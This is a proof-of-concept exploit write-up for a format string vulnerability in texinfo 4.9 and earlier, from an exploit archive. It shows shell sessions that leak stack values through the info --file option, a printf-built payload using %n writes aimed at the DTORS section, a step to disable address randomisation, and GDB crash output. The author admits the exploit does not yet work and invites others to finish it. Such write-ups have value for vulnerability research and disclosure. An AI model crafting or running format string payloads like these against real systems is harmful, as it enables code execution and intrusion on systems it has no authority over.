texinfo versions 4.9 and below format string proof of concept exploit.
7e169d4c12d029417b18bc9174f3cc127fa7d50c03bce1d3d93ba9916b25bba0
--==+=============================================+==--
--==+ texinfo <= 4.9 format string vuln PoC +==--
--==+=============================================+==--
DISCOVERED BY: Cody Rester
WEBSITE: www.codyrester.com
--==+=============================================+==--
TIMELINE:
--==+=============================================+==--
11-04-2007 - Discovered bug by fuzzing the input on texinfo 4.8
11-05-2007 - Installed via source version 4.9, bug still there
11-06-2007 - Working on Ubuntu 7.10, Stack seems randomized, the
offset and shellcode keeps changing locations
11-07-2007 - Found out how to turn off randomization
kernel.randomize_va_space = 0
11-08-2007 - Got the correct offsets and values, but keep getting
segfaults. Not sure what to do at this point.
DETAILS:
--==+=============================================+==--
cypherxero@beatrix:~$ /usr/local/bin/info --file="%x %x %x %x %x %x %x %x %x %x"
info: 0 0 8071870 2 0 0 bffff744 0 bffff6a8 805092e: No such file or directory
cypherxero@beatrix:~$
cypherxero@beatrix:~$ /usr/local/bin/info --file=BBBAAAAAB%153\$x
info: BBBAAAAAB41414141: No such file or directory
cypherxero@beatrix:~$
--==+=============================================+==--
SHELLCODE: 0xbffff9c7
DTOR: 0x08068330
OFFSET: 153
--==+=============================================+==--
cypherxero@beatrix:~$ /usr/local/bin/info --file=AAA`printf "\x30\x83\x06\x08\x31\x83\x06\x08\x32\x83\x06\x08\x33\x83\x06\x08"`%156\$43x%156\$n%156\$50x%157\$n%156\$262x%158\$n%156\$192x%159\$nA
info: AAA0�1�2�3� 8068330 8068330 8068330 8068330A: No such file or directory
Segmentation fault (core dumped)
cypherxero@beatrix:~$
--==+=============================================+==--
Examining the stack with GDB
--==+=============================================+==--
(gdb) run --file=`printf "\x30\x83\x06\x08\x31\x83\x06\x08\x32\x83\x06\x08\x33\x83\x06\x08"`%154\$45x%154\$n%154\$50x%155\$n%154\$262x%156\$n%154\$192x%157\$n...
Starting program: /usr/local/bin/info --file=`printf "\x30\x83\x06\x08\x31\x83\x06\x08\x32\x83\x06\x08\x33\x83\x06\x08"`%154\$45x%154\$n%154\$50x%155\$n%154\$262x%156\$n%154\$192x%157\$n...
info: 0�1�2�3� 8068330 8068330 8068330 8068330...: No such file or directory
Program received signal SIGSEGV, Segmentation fault.
0x35756f3d in ?? ()
(gdb) bt
#0 0x35756f3d in ?? ()
#1 0x080499ab in __do_global_dtors_aux ()
#2 0x08062c20 in _fini ()
#3 0xb7ff3a1f in ?? () from /lib/ld-linux.so.2
#4 0xb8001260 in _rtld_global () from /lib/ld-linux.so.2
#5 0x00000000 in ?? ()
(gdb) info reg
eax 0x8068334 134644532
ecx 0xbffff530 -1073744592
edx 0x35756f3d 896888637
ebx 0x8068414 134644756
esp 0xbffff4fc 0xbffff4fc
ebp 0xbffff508 0xbffff508
esi 0xb8001668 -1207953816
edi 0x0 0
eip 0x35756f3d 0x35756f3d
eflags 0x210202 [ IF RF ID ]
cs 0x73 115
ss 0x7b 123
ds 0x7b 123
es 0x7b 123
fs 0x0 0
gs 0x33 51
(gdb)
--==+=============================================+==--
CONCLUSION
--==+=============================================+==--
All offsets and values have been calculated correctly, but texinfo refuses to execute
the shellcode address given. It doesn't look like it's overwritting the DTOR correctly,
and the EIP is 0x35756f3d, which is not what I want. So, well, I just wanna get rid of
it off my mind for now, I lost 8 hours of sleep last night working on this, only to have
it time and time again fail. It's almost there, but I'm not sure how to get it working.
Thus, the Proof-of-Concept title. Hopefully someone can take this and get an exploit
working. Peace f00s.